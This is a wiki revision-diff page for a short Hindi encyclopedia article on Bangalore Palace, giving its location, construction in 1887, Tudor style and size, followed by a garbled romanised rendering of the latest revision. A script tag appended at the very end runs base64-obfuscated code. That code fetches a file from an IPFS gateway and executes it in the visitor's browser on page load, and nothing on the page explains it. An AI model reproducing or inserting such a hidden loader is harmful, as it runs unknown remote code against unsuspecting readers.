Difference between revisions of "बेंगळूरू पैलेस"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
[[चित्र:Bangalore-Palace.jpg|thumb|250px|बेंगळूरू पैलेस <br />Bangalore Palace]]
+
[[चित्र:Bangalore-Palace-1.jpg|thumb|350px|बेंगळूरू पैलेस]]
*बेंगळूरू पैलेस [[कर्नाटक]] के [[बेंगळूरू]] शहर मे स्थित है।
+
'''बेंगळूरू पैलेस''' [[कर्नाटक]] के [[बेंगळूरू]] शहर के मध्य में स्थित है।  
*बेंगळूरू पैलेस बंगलूरू शहर के मध्य में स्थित है।  
 
 
*बेंगळूरू पैलेस बंगलूरू के प्रमुख पर्यटन स्थलों में से एक है।  
 
*बेंगळूरू पैलेस बंगलूरू के प्रमुख पर्यटन स्थलों में से एक है।  
 
*बेंगळूरू पैलेस का निर्माण [[1887]] ई. में करवाया गया था।  
 
*बेंगळूरू पैलेस का निर्माण [[1887]] ई. में करवाया गया था।  
*बेंगळूरू पैलेस की वास्तुकला तुदौर शैली पर आधारित है।  
+
*बेंगळूरू पैलेस की [[वास्तुकला]] तुदौर शैली पर आधारित है।  
 
*बेंगळूरू पैलेस लगभग 800 एकड़ में फैला हुआ है।  
 
*बेंगळूरू पैलेस लगभग 800 एकड़ में फैला हुआ है।  
 
*बेंगळूरू पैलेस [[इंग्लैंड]] के वाइंडसर महल की तरह दिखाई देता है।
 
*बेंगळूरू पैलेस [[इंग्लैंड]] के वाइंडसर महल की तरह दिखाई देता है।
  
{{प्रचार}}
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 16: Line 14:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
==वीथिका==
 +
<gallery>
 +
चित्र:Bangalore-Palace.jpg|बेंगळूरू पैलेस
 +
चित्र:Bangalore-Palace-2.jpg|बेंगळूरू पैलेस
 +
चित्र:Bangalore-Palace-3.jpg|बेंगळूरू पैलेस
 +
</gallery>
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 11:20, 8 August 2017

thumb|350px|beangळooroo pailes beangळooroo pailes karnatak ke beangळooroo shahar ke madhy mean sthit hai.

  • beangळooroo pailes bangalooroo ke pramukh paryatan sthaloan mean se ek hai.
  • beangळooroo pailes ka nirman 1887 ee. mean karavaya gaya tha.
  • beangळooroo pailes ki vastukala tudaur shaili par adharit hai.
  • beangळooroo pailes lagabhag 800 ek d mean phaila hua hai.
  • beangळooroo pailes ianglaiand ke vaiandasar mahal ki tarah dikhaee deta hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>